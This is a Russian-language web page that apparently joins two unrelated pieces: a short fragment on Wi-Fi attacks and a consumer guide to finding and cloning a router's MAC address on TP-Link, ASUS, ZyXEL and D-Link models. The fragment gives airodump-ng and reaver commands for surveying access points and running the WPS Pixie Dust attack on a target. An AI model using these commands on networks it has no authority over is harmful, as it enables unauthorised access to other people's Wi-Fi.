EXTNFC = External NFC,

INTNFC = Internal NFC,

NFCINTF = NFC Interface,

PBC = Push Button. На мой взгляд достаточно полезная информация. Второй не менее полезный ключ —uptime, показывает время работы точки, если мы с вами любим использовать mdk3, нам этот ключ может пригодиться.

запускаем сбор информации

airodump-ng —wps —uptime wlan0mon

Новый reaver или здравствуй Pixie. Новый reaver поддерживает WPS Pixie Dust Attack (Offline WPS Attack). Про эту атаку можно более подробно почитать на официальном форуме kali linux https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack). Список точек уязвимых для данной атаки можно увидеть в https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?pli=1#gid=2048815923. Использование ключа –K в reaver поможет нам провести данную атаку, хочу обратить ваше внимание, что не все оборудование подвержено этой атаки.

reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -K 1 -vv

Как узнать, клонировать или сменить MAC-адрес роутера?

В этой статье мы расскажем, что такое mac-адрес роутера, как его узнать, клонировать или сменить. Многие провайдеры до сих пор практикуют привязку Интернета к одному устройству по МАС-адресу. В случае такой привязки, если пользователь сменит компьютер или переключится на другую технику, например, ноутбук, то Интернет отключится. Все дело в МАС-адресе, у каждого компьютерного устройства или роутера он уникальный.

Такая привязка абсолютно нецелесообразна и создает лишние проблемы при настройке беспроводной связи Wi-Fi. Обычно в «Центре управления сетями и общим доступом» такая ошибка подключения выглядит как «Без доступа к интернету» при настройке роутера. Если Интернет-провайдер устанавливает жесткую привязку к МАС-адресу компьютера, то Wi-Fi роутер уже не может подключиться к данной линии.

Прежде всего, мастер-настройщик должен связаться с провайдером и выяснить, существует ли МАС-привязка для данного адреса. Если ответ будет положительный, то возможны два способа подключения:

  • Клонировать МАС-адрес с компьютера-исходника в настройки роутера.
  • Сообщить провайдеру новый МАС-адрес или, если есть такая возможность, изменить его самостоятельно в личном кабинете.

Дальше я расскажу, как узнать МАС-адрес роутера и как этот адрес изменить.

Определяем МАС-адрес роутера

Возьмите в руки свой роутер и переверните его. На обратной стороне роутера есть наклейка с информацией от производителя. Среди прочих разных данных на ней есть и заводской МАС-адрес устройства.

Такая наклейка есть на всех маршрутизаторах вне зависимости от модели роутера.

Например, для роутера TP-Link она выглядит так:

А такая на роутере ZyXEL:

Или вот такая для маршрутизатора Asus:

Зная МАС-адрес роутера, звоним Интернет-провайдеру в поддержку и просим внести изменения.

Меняем МАС-адрес роутера

МАС-адрес меняется вручную непосредственно в настройках маршрутизатора. Можно либо прописать новый известный МАС-адрес, либо скопировать адрес с компьютера, который подключен к Интернету через кабель.

Чтобы скопировать МАС-адрес компьютера-исходника, необходимо подключить к нему роутер. И только после подключения выполнять настройку маршрутизатора. О входе в маргрутизатор можно прочитать в статьях: 192.168.0.1 и 192.168.1.1.

Меняем МАС-адрес роутера TP-LINK

Задаем в строке браузера IP-адрес маршрутизатора 192.168.1.1 или 192.168.0.1. При успешном подключении откроется страница авторизации роутера. Подробнее о авторизации в роутерах TP-Link: Как зайти в настройки роутера TP-Link?

Переходим в раздел Network (Сеть) и выбираем слева на панели пункт MAC Clone (Клонирование МАС-адреса). В поле Your PC’s MAC Address (МАС-адрес Вашего ПК) указан МАС-адрес компьютера, через который настраивается Интернет-подключение. Нажимаем рядом с полем кнопку Clone MAC Address (Скопировать МАС-адрес) и заменяем МАС-адрес роутера.

Не забываем сохранить изменения и перезагрузить роутер.

Меняем МАС-адрес роутера ASUS

Заходим в настройки нашего маршрутизатора и выбираем слева раздел Интернет. В поле МАС-адрес будет указан текущий адрес роутера. Чтобы изменить этот адрес нажимаем рядом с полем кнопку Клонировать МАС. Старый адрес маршрутизатора изменится на МАС-адрес подключенного компьютера. Подробнее о входе в панель управления роутером Asus: Вход в настройки на роутерах Asus (192.168.1.1)

Сохраняем все изменения нажатием на кнопку Применить.

Меняем МАС-адрес роутера ZyXEL

Открываем настройки по адресу 192.168.1.1 и выбираем пункт Интернет. В разделе настроек соединения сначала в выпадающем меню для поля Настройка параметров IP задаем параметры соединения, а после в поле МАС-адрес определяем значение Взять с вашего ПК. Или выставляем значение Ввести вручную и далее вводим заранее известный МАС-адрес.

Чтобы сохранить изменения, нажимаем кнопку Применить.

Меняем МАС-адрес роутера D-LINK

По адресу 192.168.0.1 открываем настройки роутера и слева на панели выбираем раздел Сеть. Далее нажимаем пункт WAN. В блоке Главные настройки выбираем из выпадающего списка тип соединения, а затем ниже в блоке Ethernet в поле МАС вписываем заданный МАС-адрес. Если хотим скопировать МАС-адрес подключенного компьютера, то нужно воспользоваться первой кнопкой слева от поля. При наведении на нее появиться подсказка Клонировать МАС-адрес Вашего компьютера. Подробнее о том, как зайти в настройки роутера D-Link: Как зайти в настройки роутера D-Link? Заходим на адрес 192.168.0.1

Находим кнопку Применить и сохраняем изменения в настройках.

Дипломированный специалист по безопасности компьютерных сетей. Навыки маршрутизации, создание сложных схем покрытия сетью, в том числе бесшовный Wi-Fi.

Читать еще:  Настройка Wi-Fi на роутерах D-Link [Wireless 150 и Wireless 300]
Ссылка на основную публикацию
Статьи c упоминанием слов:
Adblock
detector